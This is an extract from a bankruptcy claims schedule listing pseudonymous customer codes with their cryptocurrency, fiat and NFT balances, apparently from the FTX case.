| 07313422 | | SUSHI[.264], USD[0.00] | | |
| 07313426 | | BTC[0], DOGE[0], ETH[0], ETHW[0], SOL[0], SUSHI[0], USD[0.00], USDT[0] | | |
| 07313428 | | BTC[0], USD[0.00] | | |
| 07313433 | | USD[2.62] | | |
| 07313452 | | BTC[0], ETH[0.00010873], ETHW[0.00010873], SUSHI[0], USD[0.01] | | |
| 07313467 | | ETH[.0003232], ETHW[.0003232], LINK[16.88938], SOL[49.97], SUSHI[.3841], UNI[.02946], USD[0.41], USDT[0] | | |
| 07313470 | Contingent, Disputed | ETH[.000044], ETHW[.000044], SOL[631.83347], USD[0.39] | | |
| 07313471 | | USD[7.96] | | |
| 07313474 | | USD[1.71] | | |
| 07313475 | | ETHW[1.33166700], USDT[0.00002268] | | |
| 07313479 | | USD[10.00] | | |
| 07313482 | | DOGE[0], ETH[0], GRT[0], USD[0.00] | | |
| 07313485 | | SUSHI[.414], TRX[15206.156], USD[0.03], USDT[0.08321619] | | |
| 07313488 | | ETH[0.00000001], ETHW[0.00067866], SOL[0], USD[0.71], USDT[0.00410000] | | |
| 07313491 | | BTC[0.00009763], ETH[0], SUSHI[0.35898534], TRX[0], USD[1.13] | | |
| 07313493 | | BTC[0.01560307], DOGE[0], NFT [419533674003912543/Golden Hill #726][1], SHIB[500000], USD[8.19], USDT[0] | | |
| 07313494 | | SOL[.0723], SUSHI[.402], UNI[.0277], USD[1.56], USDT[0] | | |
| 07313498 | | BCH[0], BTC[0], DOGE[0], ETH[0], ETHW[0], LINK[0], NFT (299217072247967311/#197)[1], NFT (310421767813978291/Pet #3)[1], NFT (312190659781489277/Webaverse Genesis Pass)[1], NFT (322564462594569558/#332)[1], NFT (333950645825598973/Gold Skull)[1], NFT (351797753855615675/#229)[1], NFT (370943824549371910/#392)[1], NFT (392240547704796980/Silver Starfish)[1], NFT (404066461150146737/CryptoLegend #378)[1], NFT (418442348177446723/Gold Starfish)[1], NFT (447224809968122368/Mecha Engine: Enforcer Class 1)[1], NFT (447283979929737676/Diamond Starfish)[1], NFT (455091891017105169/Mint Pass Goblin Chest)[1], NFT (456328690771194018/#613)[1], NFT (489649551574751826/Sollama)[1], NFT (520226468806333437/seoulstarsnft #137)[1], NFT (574535175749332586/Megalodon Rogue Shark Tooth)[1], SOL[0], USD[0.00], USDT[0.00000001] | | |
| 07313500 | | BTC[0], USD[0.00] | | |
| 07313504 | | BTC[0] | | |
| 07313505 | | BTC[0], DOGE[0], GRT[0], LINK[0], LTC[0], SOL[0], SUSHI[0], TRX[0], UNI[0], USD[0.00] | | |
| 07313507 | | USD[10.00] | | |
| 07313508 | | BTC[0.00000144], CUSDT[0], USD[0.00], USDT[0.00030881] | | |
| 07313510 | | SUSHI[36.96485], USD[0.03] | | |
| 07313513 | | BTC[0], DOGE[0], ETH[0], GRT[0] | | |
| 07313514 | | NFT (306007683277082439/FTX - Off The Grid Miami #2618)[1] | | |
| 07313520 | | DOGE[2498.28], NFT (289945808561579354/Kiddo #1512)[1], SHIB[699300], SOL[66.81703525], USD[1331.14] | | |
| 07313523 | | USD[12.85] | | |
| 07313525 | | BTC[0], LINK[0], SOL[.0812], USD[0.00], USDT[0.00037769] | | |
| 07313526 | | BTC[0.25641478], DOGE[0], SOL[0], USD[0.00] | Yes | |
| 07313530 | | BTC[0], USD[0.48] | | |
| 07313531 | | BTC[0] | | |
| 07313542 | | USDT[1.9] | | |
| 07313545 | | BTC[0], DOGE[107.67600000], ETH[0], USD[0.01], USDT[0] | | |
| 07313551 | | BTC[.00053336] | | |
| 07313552 | | BTC[0], ETH[0], ETHW[0], LTC[0], SOL[0], TRX[0], USD[6200.01], USDT[0] | | |
| 07313556 | | USD[0.05] | | |
| 07313562 | | USD[0.00], USDT[.03737281] | | |
| 07313570 | | USD[10.00] | | |
| 07313573 | | BTC[0], DAI[.0000001], USD[0.00], USDT[0.00000020] | | |
| 07313577 | | ETH[0.00133410], ETHW[0.00133410], USD[0.01] | | |
| 07313578 | | BTC[0], ETHW[2.9733881], LINK[0], USD[1.83], USDT[0.00000002] | | |
| 07313580 | | BTC[0], DOGE[0], ETH[.00000001], ETHW[0], USD[2.22], USDT[0] | | |
| 07313583 | | BTC[0.25869122], ETH[3.921075], ETHW[3.921075], GRT[776], UNI[54.945], USD[5304.07], WBTC[0], YFI[.021975] | | |
| 07313585 | | BTC[.0000811], TRX[.000003] | | |
| 07313586 | | ETHW[.00004984], LINK[271.31313335], USD[0.00] | | |

Schedule F3 - Nonpriority Unsecured Customer Claims

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07313590 | | DOGE[5.994], USD[0.90] | | |
| 07313595 | | USD[0.00] | | |
| 07313598 | | BTC[0], ETH[0], ETHW[0.12977989], GRT[.00000001], USD[5.24], USDT[0.00000001] | | |
| 07313599 | | USD[100.07], USDT[0] | | |
| 07313603 | | SOL[0], TRX[0], USD[0.00] | | |
| 07313606 | | BTC[0] | | |
| 07313614 | | BTC[.0070912], SOL[3.18776], USD[4.35] | | |
| 07313619 | | DOGE[252.83363294], SOL[0], USD[0.00], USDT[0] | | |
| 07313622 | | AAVE[0], ALGO[.37651356], AVAX[.04868034], BTC[0.53947160], ETH[-0.00931696], ETHW[-0.00519995], LINK[0.03242819], MATIC[0], SOL[0.00549922], SUSHI[0.09925000], USD[10236.77], USDT[-1.00094930] | | |
| 07313626 | | SOL[1], USD[860.94] | | |
| 07313632 | | SOL[0], USD[14008.38] | | |
| 07313639 | | BTC[0], USD[0.00] | | |
| 07313642 | | BTC[0], USD[1.00] | | |
| 07313644 | | BTC[0] | | |
| 07313647 | | SOL[0], UNI[.00000001], USD[0.00], USDT[49.98614718] | | |
| 07313656 | | LTC[.0002], SUSHI[.292] | | |
| 07313663 | | USD[0.00] | | |
| 07313664 | | SOL[45.32300956], USD[0.16] | | |
| 07313672 | | BTC[0.00000850], ETH[.000917], ETHW[.000917], LINK[0.09830000], SOL[0], SUSHI[0], USD[429.91], USDT[0] | | |
| 07313673 | | BTC[0], USD[0.00], USDT[0] | | |
| 07313674 | | AAVE[2.2], ETH[0], ETHW[.00276039], USD[7.51] | | |
| 07313684 | | USD[0.00] | | |
| 07313685 | | BCH[.0000478], BTC[.00001821], ETH[.000663], ETHW[11.761663], LINK[40.00911], LTC[.001116], SUSHI[.1075], UNI[.09632], USD[0.00], USDT[0] | | |
| 07313686 | | NFT (358984703664833018/APEFUEL by Almond Breeze #23)[1], NFT (390657381680390810/#2531)[1], NFT (443255164661647408/Earl Campbell's Playbook: Rice vs. Texas - October 1st, 1977 #100)[1], NFT (514320256275127853/Divine Soldier #6634)[1], SOL[.02], USD[0.68] | | |
| 07313689 | | BTC[0], ETH[0] | | |
| 07313692 | | USD[0.00] | | |
| 07313697 | Contingent, Disputed | BTC[0], SOL[3225.40107205], USD[0.09] | | |
| 07313706 | | USD[10.00] | | |
| 07313720 | | BTC[.00004775], SOL[.0000045], USD[0.00] | | |
| 07313723 | | BTC[0], ETH[.00000001], USD[100.00] | | |
| 07313728 | | BTC[0], USD[0.00], USDT[0] | | |
| 07313730 | | NFT (449807500561406864/Entrance Voucher #4302)[1], SOL[0], USD[24.73], USDT[0] | | |
| 07313731 | | AAVE[0], AVAX[0], BCH[0], BTC[0.00000001], DOGE[0.00000001], ETH[0], GRT[0], LINK[0], LTC[0], MATIC[0.00000001], NFT (290081422593857601/SolBunnies #498)[1], NFT (290914237985835269/SolBunnies #2374)[1], NFT (297186754472448453/Soltama)[1], NFT (298269100584878091/Gift)[1], NFT (299427379345733883/Photo Study #29)[1], NFT (300981667066371108/SolBunnies #240)[1], NFT (303258764822457445/SolBunnies #2344)[1], NFT (304997880984308412/Photo Study #19)[1], NFT (311631643969115061/SolBunnies #3516)[1], NFT (315621240925188459/SolBunnies #426)[1], NFT (318421415620510120/SolBunnies #1224)[1], NFT (320456606210011445/SolBunnies #2646)[1], NFT (332335175024757556/SolBunnies #121)[1], NFT (326843346355752242/Photo Study #23)[1], NFT (329298965894222200/Tooner #14)[1], NFT (332736267781306857/#799)[1], NFT (332807210014106157/The Dragons Gift)[1], NFT (335083137609079991/Kiddo #3264)[1], NFT (342663122566303994/Photo Study #16)[1], NFT (344257941849156071/SolBunnies #2411)[1], NFT (345710233836652162/SolBunnies #3030)[1], NFT (347897145778879626/SolBunnies #3301)[1], NFT (347953113690100677/SolBunnies #2637)[1], NFT (350305144849648931/SolBunnies #1874)[1], NFT (356859755371137777/Rubber Duckie #0117)[1], NFT (357240590393828882/SolBunnies #23)[1], NFT (361841852670911623/SolBunnies #2714)[1], NFT (364743196182723853/SolBunnies #3954)[1], NFT (366671455119667857/Photo Study #31)[1], NFT (370734867933930429/SolBunnies #1675)[1], NFT (375334775412942342/Oink 877)[1], NFT (379339668564522472/SolBunnies #3455)[1], NFT (381061352524372756/FTX Crypto Cup 2022 Key #12)[1], NFT (386523296958762138/Photo Study #14)[1], NFT (386808653280268315/SolBunnies #319)[1], NFT (388052253904014172/SolBunnies #1273)[1], NFT (389398594151148565/Photo Study #25)[1], NFT (391570784011722000/Entrance Voucher #29510)[1], NFT (391384255836619191/Photo Study #1 #2)[1], NFT (405526628285578738/SolBunnies #1728)[1], NFT (411894074968883234/SolBunnies #3519)[1], NFT (415963916232335719/Tooner #19)[1], NFT (417470027686449716/SolBunnies #3279)[1], NFT (417631503192597200/SolBunnies #2271)[1], NFT (418208199672181110/SolBunnies #3189)[1], NFT (421168906397861116/SolBunnies #2581)[1], NFT (424704931418150521/Photo Study #4)[1], NFT (427048519600030634/SolBunnies #4443)[1], NFT (426124707892431455/SolBunnies #3374)[1], NFT (428392050634543068/Photo Study #21)[1], NFT (441315433931899811/SolBunnies #4005)[1], NFT (441390603747536181/SolBunnies #42)[1], NFT (442057200495350277/Photo Study #24)[1], NFT (442761977213551239/SolBunnies #1253)[1], NFT (446200256801728685/SolBunnies #773)[1], NFT (452425038895526862/SolBunnies #2372)[1], NFT (454421352992176484/SolBunnies #1756)[1], NFT (455308465059048790/SolBunnies #3653)[1], NFT (457291425117686817/SolBunnies #1399)[1], NFT (460100984469364684/Photo Study #18)[1], NFT (468872259751478421/SolBunnies #4243)[1], NFT (470352936228243326/SolBunnies #3162)[1], NFT (470608497683770653/Photo Study #11)[1], NFT (473805001685978627/SolBunnies #4021)[1], NFT (477924901907998849/SolBunnies #1206)[1], NFT (478819988968900713/Photo Study #1 #3)[1], NFT (482884385587672393/SolBunnies #141)[1], NFT (484441515075538711/SolBunnies #1996)[1], NFT (488443810132028589/SolBunnies #2765)[1], NFT (489087349591430806/SolBunnies #1819)[1], NFT (500524866043618867/SolBunnies #575)[1], NFT (502093498368414262/Tooner #15)[1], NFT (503898285306416263/SolBunnies #4051)[1], NFT (505109746707797971/Photo Study #26)[1], NFT (508547180672473647/Photo Study #32)[1], NFT (509478798020117503/SolBunnies #3601)[1], NFT (512837206098072426/PAC)[1], NFT (513955935686264058/SolBunnies #3449)[1], NFT (514004472668350554/Photo Study #12)[1], NFT (516693528177417795/SolBunnies #870)[1], NFT (519190744425199928/Photo Study I)[1], NFT (519865571886816655/SolBunnies #3932)[1], NFT (520981938541784534/SolBunnies #2673)[1], NFT (528339003102104696/SolBunnies #3975)[1], NFT (529507378599763549/Photo Study #30)[1], NFT (530862147132004628/SolBunnies #609)[1], NFT (533268713511341847/SolBunnies #923)[1], NFT (538274539294724371/SolBunnies #1638)[1], NFT (538860259233828174/SolBunnies #3807)[1], NFT (541148481659048496/#704)[1], NFT (547496425837359181/SolBunnies #1025)[1], NFT (550916210284055381/SolBunnies #3570)[1], NFT (557018620541269478/SolBunnies #2630)[1], NFT (559457487856910048/SolBunnies #3000)[1], NFT (564246916378084904/SolBunnies #2109)[1], PAXG[0.00000001], SHIB[0], SOL[0.00000001], SUSHI[0.00000001], TRX[0.00000001], UNI[0], USDT[0.00000023] | | |
| 07313737 | | DOGE[.836], ETH[.000548], ETHW[.000548], USD[0.47] | | |
| 07313751 | | BTC[0], DOGE[.28], USD[0.00], USDT[0.00147487] | | |
| 07313757 | | BTC[0], SOL[0], SUSHI[0], USD[592.01] | | |
| 07313758 | | USD[37.40] | | |
| 07313764 | | USD[0.87] | | |
| 07313767 | | NFT (365551465533870392/Cosmic Creations #286)[1], NFT (407015797754523328/Sun Set #766)[1], NFT (519447529048926840/Sun Set #941)[1], NFT (519669354790952356/Colossal Cacti #986)[1], USD[59.83] | | |
| 07313772 | | BTC[0.00002852], SOL[35.47626550], USD[12.05] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07313778 | | USD[10.00] | | |
| 07313779 | | BTC[0], USD[0.33], USDT[0] | | |
| 07313780 | | USD[10.00] | | |
| 07313794 | | USD[0.00], USDT[0] | | |
| 07313804 | | DOGE[.713], USD[0.00] | | |
| 07313806 | | BTC[0], SOL[0], USD[0.00] | | |
| 07313809 | | BAT[249], BTC[.1926512], LINK[19.92], USD[694.40] | | |
| 07313820 | | BTC[.00049105], USD[0.00], YFI[.000396] | | |
| 07313842 | | TRX[.0394], USDT[.060161] | | |
| 07313844 | | USD[10.00] | | |
| 07313846 | | ETH[.00000001], USD[0.00] | | |
| 07313847 | Contingent, Disputed | USD[10.00] | | |
| 07313863 | | BTC[0], LTC[.00018266], USD[0.05] | | |
| 07313865 | | USD[10.00] | | |
| 07313871 | | BAT[0.77939049], BCH[0.00164033], BTC[0.00001000], DOGE[1], ETH[0.00064246], ETHW[0.00064246], LTC[0], USD[0.00] | | |
| 07313872 | | SOL[209.986], USD[7.50] | | |
| 07313873 | | BTC[.00005269], ETH[.179048], ETHW[.179048], LINK[.008], SOL[0], SUSHI[0.21800000], UNI[.0308], USD[2.53] | | |
| 07313876 | Contingent, Disputed | USD[10.00] | | |
| 07313884 | | DOGE[0], ETH[0], USD[0.00], USDT[0] | | |
| 07313887 | | ETH[0], ETHW[0], USD[2999.60], USDT[0.00000040] | | |
| 07313892 | | USD[0.00] | | |
| 07313893 | | BTC[0], DOGE[0], LINK[0], SOL[0], SUSHI[0], TRX[0] | | |
| 07313900 | | BTC[0], USD[2.70] | | |
| 07313903 | | ETHW[10.98], LINK[399.6], USD[0.00], USDT[0] | | |
| 07313904 | | AAVE[.00845], BCH[.000895], BTC[0.00008834], DOGE[.0237], ETH[.0007076], ETHW[.0007076], GRT[0], LINK[.04738], PAXG[.0000428], SOL[.0256], SUSHI[.00000001], TRX[.125], UNI[.1297], USD[66081.99], USDT[0] | | |
| 07313907 | | USD[10.00] | | |
| 07313910 | | BTC[0.00004745], ETH[.00086], ETHW[.00086] | | |
| 07313922 | | BTC[0.00000336], DOGE[.68], ETH[0], ETHW[0], LTC[.009], TRX[515.64], USD[0.12] | | |
| 07313923 | | BCH[0], BTC[0], DOGE[0], ETH[0], PAXG[0], USD[0.00] | | |
| 07313927 | | BTC[0], ETH[0], USD[0.01], USDT[0] | | |
| 07313934 | | USD[10.00] | | |
| 07313935 | | USD[10.00] | | |
| 07313938 | | USD[10.00] | | |
| 07313940 | | USD[10.00] | | |
| 07313941 | | USD[10.00] | | |
| 07313942 | | USD[10.00] | | |
| 07313943 | | USD[10.00] | | |
| 07313944 | | BTC[.00018869], USD[16.59] | | |
| 07313946 | | USD[0.00] | | |
| 07313954 | | BTC[0] | | |
| 07313960 | | USD[1.98] | | |
| 07313968 | | BTC[0], DOGE[538.8744], ETH[.00000001], ETHW[0], TRX[.3844], USD[0.04], USDT[0] | | |
| 07313973 | | NFT (556886488789411672/FTX - Off The Grid Miami #1466)[1] | | |
| 07313976 | | ETH[.00076646], ETHW[0.00076645], USDT[3.000208] | | |
| 07313978 | | BTC[0.12156686], ETH[0], EUR[0.00], GRT[0], LINK[0], MATIC[0], NFT (388791057620160008/Romeo #917)[1], NFT (478050677252753587/Entrance Voucher #3482)[1], SOL[0], SUSHI[0], UNI[0], USD[0.00], USDT[0], WBTC[0], YFI[0] | | |
| 07313979 | | USD[8.37] | | |
| 07313998 | | BTC[0], DOGE[0], GRT[1772.66245399], MATIC[2120.56877314], UNI[345.92391506], USD[6449.56] | | |
| 07314019 | | USD[10.00] | | |
| 07314021 | | BTC[0], DOGE[.74698795], USD[1.73], USDT[0] | | |
| 07314022 | | BTC[0] | | |
| 07314024 | | SOL[0.00198260], USD[0.00], USDT[0] | | |
| 07314026 | | USDT[0.00001313] | | |
| 07314028 | | BTC[.01061511], USD[0.52] | | |
| 07314030 | | MATIC[12] | | |
| 07314033 | | LINK[.0356], USD[0.00], USDT[0] | | |
| 07314035 | | BTC[0.00002896], DOGE[.803], ETH[.0002331], ETHW[.0002331], SUSHI[.26962], USD[0.00] | | |
| 07314036 | | USD[13.11] | | |
| 07314037 | | USD[0.01], USDT[.005898] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07314038 | | AAVE[0.00000001], AUD[0.00], AVAX[503.48566029], BCH[0], BRZ[0], BTC[0], CUSDT[0], DAI[0], DOGE[0.00000001], ETH[0], ETHW[0.00015628], EUR[0.00], GRT[0], LINK[0.00000001], LTC[0.00000001], MATIC[0.00000001], MKR[0], SOL[0], SUSHI[0.00000001], TRX[0], UNI[0], USD[0.00], USDT[0.00357124], WBTC[0], YFI[0.00000001] | | |
| 07314045 | | DOGE[0], ETH[0], USD[0.00] | | |
| 07314062 | | USDT[.01] | | |
| 07314065 | | USD[10.00] | | |
| 07314066 | | BTC[.00000068], DOGE[.764], ETH[.000324], ETHW[.000324], LTC[.00512] | | |
| 07314071 | | USD[1.59], USDT[0.00000001] | | |
| 07314072 | | USD[10.00] | | |
| 07314074 | | SOL[0.10000000], USD[0.00] | | |
| 07314075 | | LTC[.0292], USD[0.72], USDT[0.00000001] | | |
| 07314076 | Contingent, Disputed | USD[0.00000001] | | |
| 07314080 | | ETH[0.20245848], ETHW[0.20245848], NFT [29403398616078010186/Reflector #12][1], NFT [34589291283167639 4/Night Light #661][1], NFT [35055935727095399 9/Cosmic Creations #815][1], NFT [46182565280930425 5/Night Light #509 (Redeemed)][1], NFT [50641501377785416 7/Entrance Voucher #3368][1], SOL[208.27459596], USD[80.27], USDT[4.84711789] | | |
| 07314082 | | ETH[.00000001], USD[0.00] | | |
| 07314089 | | USD[0.00] | | |
| 07314092 | | BTC[.0000098], ETH[0], SOL[1.43674], USD[0.00], USDT[0] | | |
| 07314098 | | BTC[0.00039163], DOGE[.034], ETH[.000936], ETHW[.000936], USD[0.06] | | |
| 07314101 | Contingent, Disputed | BTC[0.06707661], DOGE[456.543], ETH[.13159], ETHW[.13159], LINK[3.4965], SOL[19.1808], SUSHI[35.4645] | | |
| 07314106 | | SUSHI[.00000001], USD[7.36] | | |
| 07314109 | | DOGE[0.06406238], ETH[0], USD[0.00] | | |
| 07314112 | | DOGE[975.84268029], LTC[.00322317], SOL[1.61000000], UNI[0], USD[0.27] | | |
| 07314118 | | USD[0.49] | | |
| 07314119 | | BTC[0.00395237], DOGE[0], ETH[0], GRT[0], SOL[0], SUSHI[0], USD[0.75] | | |
| 07314130 | | BTC[0.00026202], DOGE[0], LTC[.15460594], TRX[33.87], USD[90.16], USDT[0] | | |
| 07314131 | | USD[2.26], USDT[.00962] | | |
| 07314138 | | USD[0.00] | | |
| 07314141 | | SOL[0] | | |
| 07314159 | | BTC[0.00002064], USD[1.65] | | |
| 07314167 | | BTC[0], NFT [55705399768635213 7/Joe Theismann's Playbook: Washington vs. Chicago Bears - September 29, 1985 #48][1], SOL[1.59], USD[0.05] | | |
| 07314178 | | AVAX[0], BTC[0], USD[0.15], USDT[0] | | |
| 07314182 | | USD[0.01] | | |
| 07314183 | | ETHW[.000105], SOL[0.00717738], USD[0.00] | | |
| 07314186 | | BTC[0] | | |
| 07314189 | | BCH[.00729923], DOGE[578.667], ETH[.60570064], ETHW[.60570064], LTC[.51792], PAXG[.01314217], SOL[5.976], TRX[184.93772481], USD[29.67] | | |
| 07314190 | | BTC[.01245], ETH[0.22740772], ETHW[0.22740772], LINK[2.5896], LTC[.26892], USD[0.98] | | |
| 07314195 | | USD[0.48] | | |
| 07314197 | | SHIB[1], USD[28.45] | | |
| 07314205 | | MATIC[0], SOL[0], USD[0.18] | | |
| 07314206 | | BTC[.00004347] | | |
| 07314210 | | BTC[0], DOGE[3], ETH[0], EUR[0.00], NFT [33519167184559100 0/Bitcoin #9][1], NFT [48218560349990119 6/Simple Tree][1], NFT [52457467692444321 5/Saudi Arabia Ticket Stub #2295][1], SHIB[6], TRX[11], USD[0.00], USDT[0.00005771] | Yes | |
| 07314211 | | DOGE[.857], USD[0.00], USDT[0] | | |
| 07314212 | | SUSHI[0], USD[0.57] | | |
| 07314219 | | USD[10.00] | | |
| 07314220 | Contingent, Disputed | SOL[.00606484], USD[1.44], USDT[0] | | |
| 07314221 | | DOGE[26.00968929], SHIB[6922469.8990724], SOL[47.69401976], USD[0.00] | | |
| 07314223 | | USD[5.20] | | |
| 07314224 | | BTC[0], ETH[0], ETHW[0.05287045], LINK[.0478], USD[0.00], USDT[3.778228] | | |
| 07314226 | | SOL[0.00000001], USD[0.00] | | |
| 07314228 | | BTC[0.00008580], DOGE[.03], ETH[0.00020257], ETHW[0.00020257], SOL[.0079], USD[0.61] | | |
| 07314234 | | USD[10.00] | | |
| 07314237 | | USD[10.00] | | |
| 07314238 | | ETHW[4.161834], USD[3.20] | | |
| 07314239 | Contingent, Disputed | BTC[0], ETH[0], NFT [54284361079789492 6/FTX - Off The Grid Miami #3913][1], SOL[0], USD[0.00], USDT[0.00000001], YFI[0] | | |
| 07314242 | | USD[10.00] | | |
| 07314247 | | USD[10.00] | | |
| 07314250 | | AVAX[14.6853], BTC[.020979], MATIC[799.2], SHIB[9990000], SUSHI[371.628], TRX[5104.89], USD[1.83], USDT[1.04078509] | | |
| 07314256 | | BTC[.00022202], DOGE[.87115745], TRX[.488], USD[0.00], YFI[.000628] | | |
| 07314259 | | USD[0.73], USDT[16.1285] | | |
| 07314263 | | USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07314268 | | USD[10.00] | | |
| 07314271 | | BAT[0], BCH[0], BTC[0], CHF[0.00], DOGE[0], ETH[0], ETHW[0], GBP[0.00], LTC[0], PAXG[0], SUSHI[0], TRX[0], UNI[0], USD[0.00] | | |
| 07314284 | | NFT (5286228982083212224/Entrance Voucher #2728)[1], USD[0.16] | | |
| 07314289 | | USD[10.00] | | |
| 07314292 | | BTC[0], SOL[0], USD[0.00] | | |
| 07314293 | | USD[10.00] | | |
| 07314294 | | SOL[0], USD[0.00] | | |
| 07314295 | | USD[50.51] | | |
| 07314296 | | BTC[.00003556], USD[9.82] | | |
| 07314304 | | USD[10.00] | | |
| 07314305 | | USD[10.00] | | |
| 07314307 | | USD[10.00] | | |
| 07314308 | | USD[10.00] | | |
| 07314316 | | BCH[.0009144], BTC[0], DOGE[0.01391476], GRT[.2032], LINK[.0343], MATIC[7.634], MKR[.0005274], SHIB[104350], SOL[714.209476], SUSHI[0.13391690], TRX[.913], UNI[.08596], USD[11.40] | | |
| 07314318 | | AAVE[.00899], AVAX[.099], BTC[0.00000152], ETH[.000915], ETHW[.000915], LINK[26.082], MATIC[.256], NEAR[.082], NFT (3115992824959678712/Bitcoin City Etching)[1], NFT (3169159945117644540/Bitcoin City Fantasy)[1], NFT (3329701526277617714/Bitcoin B War)[1], NFT (3363175849193658337/Gem)[1], NFT (3485916342301077532/Peace in the World)[1], NFT (3630491300060628239/Bal du moulin de la Galette d)[1], NFT (3665802188639422337/Bitcoin and Ethereum Token)[1], NFT (3703557617695884552/Ethereum Engrave)[1], NFT (3748111902040515723/Purple Soul)[1], NFT (3788511510894455986/SOL Rainbow)[1], NFT (3790078785035894565/Self Reflection)[1], NFT (3887022923032403439/Ripple)[1], NFT (3990898616734914671/Bitcoin Star)[1], NFT (4064828194642824162/XRP Love)[1], NFT (4099421227092142246/SOL Flower)[1], NFT (4141277012018066575/B&Y HD)[1], NFT (4150724416096863043/Bitcoin City Vibrant)[1], NFT (4165097630533682091/Bitcoin Coin)[1], NFT (4198208327838305752/Starry Night Hot)[1], NFT (4349636584758068251/Miami Ticket Stub #565)[1], NFT (4364571773720847551/Bitcoin Abstract)[1], NFT (4420277055187159001/Mistery Token)[1], NFT (4457752718881864211/Peace in the Sky)[1], NFT (4513275269357267055/Bitcoin Token)[1], NFT (4548580858106761552/Cafe Terrace at Night hot)[1], NFT (4722049703389846455/UkraineFlag)[1], NFT (4790831433785075917/The Persistence of Memory)[1], NFT (4821102437787945588/Bitcoin A Token)[1], NFT (4828430011496385394/Bitcoin City Blacklight)[1], NFT (4839503666364419943/Bitcoin City HD)[1], NFT (4900878856177207637/Forest)[1], NFT (5169959548165020007/Ethereum Flower)[1], NFT (5331263041095960978/Bitcoin City G)[1], NFT (5424849862735993097/Bal du moulin de la Galette g)[1], NFT (5506599201560597657/UniqueNature1)[1], NFT (5555209592895946247/Total)[1], NFT (5572634959152385527/Bitcoin Rocks)[1], NFT (5579028170247426417/Bitcoin City Dark Fantasy)[1], NFT (5685092634819657077/Bitcoin City Moonwalk)[1], NFT (5686232203865305094/Entrance Voucher #3318)[1], SOL[.0059], USD[0.22], USDT[.0084484] | | |
| 07314325 | | USD[15.87] | | |
| 07314331 | | ETHW[.005], TRX[.000205], USD[0.00], USDT[0] | | |
| 07314334 | | DOGE[0], USD[0.02] | | |
| 07314339 | | SOL[.00000001], USD[11.94], USDT[0] | | |
| 07314356 | | BTC[0.00010000], ETH[.00000001], ETHW[0], SOL[0], USD[0.23], USDT[0] | | |
| 07314372 | | BTC[.00003514], ETH[.0003366] | | |
| 07314381 | | ETH[0], ETHW[0], GRT[0], SOL[0], TRX[0], USDT[0.00001502] | | |
| 07314383 | | SOL[.005], SUSHI[.140425], USD[0.00] | | |
| 07314387 | | BTC[.00009273] | | |
| 07314393 | | BTC[0], DOGE[0], LINK[0], TRX[0] | | |
| 07314394 | | BTC[0], USD[0.00] | | |
| 07314403 | | BTC[0.00024430], DOGE[.399], ETH[.000026], ETHW[.000026], GRT[.308], LINK[.0012], SOL[0.00640701], SUSHI[.2868], UNI[.0029], USD[388.04], USDT[9.03000000] | | |
| 07314411 | | SOL[0] | | |
| 07314415 | | BTC[0], LTC[.009], SOL[.00202436], USD[35042.13], USDT[0.00294909] | | |
| 07314417 | Contingent, Disputed | DOGE[.65605], GRT[.533], USD[0.01], USDT[0] | | |
| 07314419 | | LTC[.49156469], USDT[2.1511608] | | |
| 07314423 | | DOGE[0], ETH[0], SOL[0], SUSHI[0], USD[0.00] | | |
| 07314429 | | USD[28.61] | | |
| 07314433 | | SOL[1.992], USD[0.85] | | |
| 07314435 | | USD[0.00] | | |
| 07314436 | | BTC[0.00000001], TRX[.000005], USD[0.00], USDT[0.02079029] | | |
| 07314439 | | BTC[0.00002277], TRX[.059], USD[0.05], USDT[0] | | |
| 07314441 | | BTC[0], ETH[0], LTC[0], TRX[0], USD[0.00] | | |
| 07314448 | | BTC[0.00009960], ETH[0], ETHW[0], SOL[0.02034282], UNI[0], USD[1.93], USDT[0] | | |
| 07314449 | | BTC[.0001937], SOL[.099], USD[2.51] | | |
| 07314453 | | ETH[0], ETH[0], ETHW[0], SUSHI[0.00000001], USD[0.00], WBTC[0] | | |
| 07314462 | | ETH[-0.00000002], SOL[0], USD[1.63], USDT[0] | | |
| 07314464 | | SOL[0], TRX[0], USD[0.00] | | |
| 07314474 | | BCH[.000986], BTC[0], DOGE[.517], GRT[.048], LINK[.0553], LTC[.00318], SUSHI[.301], USD[0.18], USDT[0] | | |
| 07314480 | | USD[0.05] | | |
| 07314484 | | BAT[0], BRZ[3.00055141], BTC[0], CUSDT[11.01501254], DOGE[14.70015194], GRT[.786226], LINK[0], NFT (2967223210599786143/SolBears)[1], NFT (3300347640292947703/The Hill by FTX #1776)[1], NFT (3333293527817025160/The Hill by FTX #1758)[1], NFT (3655943079911576691/Imola Ticket Stub #1621)[1], NFT (3820174128729175597/The Hill by FTX #1506)[1], NFT (4382350362987574313/The Hill by FTX #1528)[1], NFT (5046657729242220752/Bears Reloaded Alert)[1], NFT (5078026489001313344/The Hill by FTX #1437)[1], NFT (5706946018797997299/The Hill by FTX #1508)[1], SOL[0], TRX[8], USD[0.00], YFI[0] | | |
| 07314487 | | CUSDT[4], DOGE[.20511515], ETHW[109.82743544], GRT[1], NFT (3325852910750999944/Joe Theismann's Playbook: Washington vs. Chicago Bears - September 29, 1985 #2)[1], NFT (3770838759942712266/Bahrain Ticket Stub #1088)[1], NFT (4565781923211873311/Barcelona Ticket Stub #1979)[1], NFT (4659364237442104457/You in, Miami? #12)[1], NFT (4957446187171112241/Shannon Sharpe's Playbook: Denver Broncos vs. Los Angeles Raiders - January 9, 1994 #3)[1, TRX10.07452291], USD[1778.36], USDT[1.06907827] | Yes | |
| 07314488 | | USD[0.00], USDT[0.04010178] | | |

Schedule F-1 Non-priority Unsecured Customer Claims

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07314493 | | USD[0.00], USDT[39.81608591] | | |
| 07314498 | | BTC[.00008339] | | |
| 07314505 | | USD[10.00] | | |
| 07314511 | | USD[10.00] | | |
